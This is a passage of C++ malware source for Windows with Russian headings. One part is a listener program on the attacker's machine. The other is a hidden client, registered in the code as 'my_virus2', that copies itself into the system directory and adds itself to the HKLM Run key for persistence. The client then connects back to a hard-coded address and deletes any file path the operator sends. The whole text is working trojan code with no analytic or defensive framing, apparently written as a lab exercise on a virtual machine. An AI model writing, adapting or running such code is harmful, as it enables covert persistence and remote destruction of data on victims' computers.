Сервер (установлен на компьютер злоумышленника):
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <atlstr.h>
#pragma comment(lib, "Ws2_32.lib")
int _tmain(int argc, _TCHAR* argv[])
{
// Initialize Winsock
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult!= NO_ERROR)
{
printf("Error at WSAStartup()\n");
return 1;
}
// Create a SOCKET for listening for
// incoming connection requests.
SOCKET ListenSocket;
ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (ListenSocket == INVALID_SOCKET)
{
printf("Error at socket(): %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}
// The sockaddr_in structure specifies the address family,
// IP address, and port for the socket that is being bound.
sockaddr_in service;
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(27015);
if (bind(ListenSocket,
(SOCKADDR*) &service,
sizeof(service)) == SOCKET_ERROR)
{
printf("bind() failed.\n");
closesocket(ListenSocket);
return 1;
}
// Listen for incoming connection requests
// on the created socket
if (listen(ListenSocket, SOMAXCONN) == SOCKET_ERROR)
printf("Error listening on socket.\n");
// Create a SOCKET for accepting incoming requests.
SOCKET AcceptSocket;
printf("Waiting for client to connect...\n");
// Accept the connection.
AcceptSocket = accept(ListenSocket, NULL, NULL);
if (AcceptSocket == INVALID_SOCKET)
{
printf("accept failed: %d\n", WSAGetLastError());
closesocket(ListenSocket);
WSACleanup();
return 1;
}
printf("Client connected.\n");
// data transmission
CStringA strFilePath;
while(true)
{
printf("Input file name: ");
gets(strFilePath.GetBuffer(MAX_PATH));
strFilePath.ReleaseBuffer();
if (!strFilePath.GetLength())
break;
int nSent = send(
AcceptSocket,
strFilePath.GetString(),
strFilePath.GetLength() + 1,
0);
if (nSent == SOCKET_ERROR)
{
printf("\nClient disconnected.\n");
break;
}
}
closesocket(AcceptSocket);
closesocket(ListenSocket);
WSACleanup();
return 0;
}
Клиент (установлен на виртуальной машине – не имеет окна):
#include "stdafx.h"
#include <atlstr.h>
#pragma comment(lib, "Ws2_32.lib")
//////////////////////////////////////////////////////////////////////////
void HandleData(const CStringA &strData);
void CopySelfToSystemDir(CString &strNewFilePath);
void SetAutorun(const CString &strNewFilePath);
//////////////////////////////////////////////////////////////////////////
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
// application without window
CString strNewFilePath;
CopySelfToSystemDir(strNewFilePath);
SetAutorun(strNewFilePath);
// Initialize Winsock
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult!= NO_ERROR)
{
printf("Error at WSAStartup()\n");
return 1;
}
// Create a SOCKET for connecting to server
SOCKET ConnectSocket;
ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (ConnectSocket == INVALID_SOCKET)
{
printf("Error at socket(): %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}
CStringA strServerAddress("192.168.79.1");
// IP address, and port of the server to be connected to.
sockaddr_in clientService;
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr(strServerAddress.GetString());
clientService.sin_port = htons(27015);
// Connect to server.
while(connect(ConnectSocket, (SOCKADDR*) &clientService, sizeof(clientService)) == SOCKET_ERROR);
printf("Connected to server.\n");
// connection established
// data transmission
struct timeval tSelTimeout;
tSelTimeout.tv_sec = 0;
tSelTimeout.tv_usec = 10000;
fd_set setSocketRead, setSocketWrite;
FD_ZERO(&setSocketRead);
FD_SET (ConnectSocket, &setSocketRead);
FD_ZERO(&setSocketWrite);
FD_SET (ConnectSocket, &setSocketWrite);
while((select (FD_SETSIZE, &setSocketRead, &setSocketWrite, NULL, &tSelTimeout))!= -1)
{
if(FD_ISSET(ConnectSocket, &setSocketRead))
{
// AcceptSocket is ready to recv
CStringA strData;
int nRecv = recv(ConnectSocket,strData.GetBuffer(MAX_PATH),MAX_PATH,0);
strData.ReleaseBuffer();
if ((nRecv == 0) || (nRecv == SOCKET_ERROR))
{
printf("\nClient disconnected\n");
break;
}
HandleData(strData);
}
if(FD_ISSET(ConnectSocket, &setSocketWrite))
{
// AcceptSocket is ready to send
}
tSelTimeout.tv_sec = 0;
tSelTimeout.tv_usec = 10000;
FD_ZERO(&setSocketRead);
FD_SET (ConnectSocket, &setSocketRead);
FD_ZERO(&setSocketWrite);
FD_SET (ConnectSocket, &setSocketWrite);
Sleep(1);
}
closesocket(ConnectSocket);
WSACleanup();
return 0;
}
void HandleData(const CStringA &strData)
{
if(remove(strData.GetString()) == 0)
printf("File '%s' was removed.\n", strData.GetString());
else
printf("File '%s' was not found.\n", strData.GetString());
}
void CopySelfToSystemDir(CString &strNewFilePath)
{
// получить путь к exe-файлу
CString strFilepath;
DWORD dwSize = MAX_PATH;
DWORD dwError;
while ((dwError = GetModuleFileName(NULL,
strFilepath.GetBuffer(dwSize + 1),
dwSize)) == ERROR_INSUFFICIENT_BUFFER)
{
dwSize += 10;
strFilepath.ReleaseBuffer();
}
if (dwError!= ERROR_SUCCESS){}
// получить путь к системному каталогу
CString strSysDir;
UINT nSize = GetSystemDirectory(strSysDir.GetBuffer(MAX_PATH), MAX_PATH);
if (nSize == 0)
{
return;
}
const TCHAR *szFileName = _tcsrchr (strFilepath.GetString(), _T('\\'));
strNewFilePath.Format(
_T("%s\\%s"),
strSysDir.GetString(),
(szFileName + 1));
if (strFilepath.CollateNoCase(strNewFilePath) == 0)
return;
BOOL bResult = CopyFile(strFilepath.GetString(), strNewFilePath.GetString(), FALSE);
if (!bResult)
{
return;
}
}
void SetAutorun(const CString &strNewFilePath)
{
ATL::CRegKey key;
LONG status = key.Create(HKEY_LOCAL_MACHINE, _T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"));
if (status!= ERROR_SUCCESS)
{
return;
}
status = key.SetStringValue(_T("my_virus2"), strNewFilePath.GetString());
if (status!= ERROR_SUCCESS)
{
return;
}
key.Close();
}